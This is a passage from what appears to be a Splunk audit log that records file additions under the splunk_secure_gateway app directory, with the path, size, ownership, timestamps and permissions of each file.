17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/run_as_exceptions.py", isdir=0, size=493, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.608, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/load_balancer_exceptions.py", isdir=0, size=472, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.603, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/key_not_found_exception.py", isdir=0, size=314, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.600, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/error_message_helper.py", isdir=0, size=1073, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.596, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:13.592, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/exceptions/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/util.cpython-37.pyc", isdir=0, size=3032, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.480, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/search_mapper.cpython-37.pyc", isdir=0, size=1832, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.477, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/parse_search.cpython-37.pyc", isdir=0, size=3292, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/parse_helpers.cpython-37.pyc", isdir=0, size=2173, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.468, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/parse_event_handler.cpython-37.pyc", isdir=0, size=5345, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.464, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/parse_data.cpython-37.pyc", isdir=0, size=5731, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/parse_dashboard_definition.cpython-37.pyc", isdir=0, size=10774, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.455, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/input_token_set.cpython-37.pyc", isdir=0, size=7313, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/drilldown_helpers.cpython-37.pyc", isdir=0, size=2141, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.445, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/dashboard_request_json.cpython-37.pyc", isdir=0, size=3022, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.441, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/dashboard_meta.cpython-37.pyc", isdir=0, size=2686, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/dashboard_helpers.cpython-37.pyc", isdir=0, size=4584, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__/__init__.cpython-37.pyc", isdir=0, size=170, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.326, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/util.py", isdir=0, size=4545, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.321, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/search_mapper.py", isdir=0, size=3321, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.318, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/parse_search.py", isdir=0, size=4053, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.313, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/parse_helpers.py", isdir=0, size=1842, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.309, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/parse_event_handler.py", isdir=0, size=5407, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.305, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/parse_data.py", isdir=0, size=9429, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/parse_dashboard_definition.py", isdir=0, size=20711, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.294, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/input_token_set.py", isdir=0, size=10551, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.290, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/generate_dashboard.py", isdir=0, size=3022, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.286, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/drilldown_helpers.py", isdir=0, size=2293, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.282, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/dashboard_request_json.py", isdir=0, size=3971, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.275, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/dashboard_meta.py", isdir=0, size=4548, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.269, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/dashboard_helpers.py", isdir=0, size=5023, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.265, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:13.261, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/dashboard/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:13.156, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/version_request_processor.cpython-37.pyc", isdir=0, size=4000, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.152, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/token_refresh_request_processor.cpython-37.pyc", isdir=0, size=2132, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.148, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/subscription_request_processor.cpython-37.pyc", isdir=0, size=22964, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.144, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/splunk_auth_header.cpython-37.pyc", isdir=0, size=1336, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.140, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/spacebridge_request_processor.cpython-37.pyc", isdir=0, size=12189, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/request_type.cpython-37.pyc", isdir=0, size=4087, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.131, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/request_processor.cpython-37.pyc", isdir=0, size=11012, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.127, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/request_list.cpython-37.pyc", isdir=0, size=3191, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.123, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/legacy_request.cpython-37.pyc", isdir=0, size=4964, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.120, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/generic_request_processor.cpython-37.pyc", isdir=0, size=5958, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.115, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/dashboard_request_processor.cpython-37.pyc", isdir=0, size=17601, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.111, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/connectivity_test_request_processor.cpython-37.pyc", isdir=0, size=4060, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.107, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/client_config_request_processor.cpython-37.pyc", isdir=0, size=1147, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.102, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/app_list_request_processor.cpython-37.pyc", isdir=0, size=7575, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.098, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/alerts_request_processor.cpython-37.pyc", isdir=0, size=17962, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:13.037, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__/__init__.cpython-37.pyc", isdir=0, size=236, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.833, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/version_request_processor.py", isdir=0, size=5059, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.828, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/token_refresh_request_processor.py", isdir=0, size=3060, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.824, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/subscription_request_processor.py", isdir=0, size=51557, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.818, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/splunk_auth_header.py", isdir=0, size=740, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/spacebridge_request_processor.py", isdir=0, size=16624, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.810, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/request_type.py", isdir=0, size=3843, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/request_processor.py", isdir=0, size=15907, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.800, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/request_list.py", isdir=0, size=4222, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.793, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/legacy_request.py", isdir=0, size=7771, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.789, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/generic_request_processor.py", isdir=0, size=7936, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.785, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/dashboard_request_processor.py", isdir=0, size=33118, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.782, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/connectivity_test_request_processor.py", isdir=0, size=5564, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.778, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/client_config_request_processor.py", isdir=0, size=907, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.773, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/app_list_request_processor.py", isdir=0, size=12514, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.769, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/alerts_request_processor.py", isdir=0, size=26734, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.764, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:12.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/request/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.655, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_update_message.cpython-37.pyc", isdir=0, size=3601, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.651, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_search_requests.cpython-37.pyc", isdir=0, size=17514, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.648, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_requests.cpython-37.pyc", isdir=0, size=8029, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.644, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_processor.cpython-37.pyc", isdir=0, size=10298, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.640, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_map_requests.cpython-37.pyc", isdir=0, size=1233, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.636, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_manager.cpython-37.pyc", isdir=0, size=4687, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:13 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.633, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_helpers.cpython-37.pyc", isdir=0, size=3309, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_client.cpython-37.pyc", isdir=0, size=6690, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.623, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/subscription_clean_up.cpython-37.pyc", isdir=0, size=4041, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:13 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.615, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/process_trellis.cpython-37.pyc", isdir=0, size=8960, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/process_manager.cpython-37.pyc", isdir=0, size=2815, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:13 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.607, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/loader.cpython-37.pyc", isdir=0, size=7813, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:13 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.603, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/job_result.cpython-37.pyc", isdir=0, size=602, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.599, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__/__init__.cpython-37.pyc", isdir=0, size=242, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:10 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.392, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_update_message.py", isdir=0, size=4650, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.388, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_search_requests.py", isdir=0, size=31703, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.384, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_requests.py", isdir=0, size=10746, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.380, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_processor.py", isdir=0, size=22084, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.376, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_map_requests.py", isdir=0, size=1195, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.372, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_manager.py", isdir=0, size=5551, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.368, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_helpers.py", isdir=0, size=3915, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.364, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_client.py", isdir=0, size=7654, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.360, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/subscription_clean_up.py", isdir=0, size=4960, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/process_trellis.py", isdir=0, size=16776, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.351, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/process_manager.py", isdir=0, size=2930, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/loader.py", isdir=0, size=8321, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.343, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/job_result.py", isdir=0, size=285, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.339, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:13 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:42:12.333, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/subscriptions/__init__.py", isdir=0, size=63, gid=41812, uid=41812, modtime="Fri Apr 2 17:54:59 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:12.229, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/__pycache__/device_role_mapping.cpython-37.pyc", isdir=0, size=4783, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:11 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:12.225, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_secure_gateway/bin/spacebridgeapp/alerts/__pycache__/__init__.cpython-37.pyc", isdir=0, size=235, gid=41812, 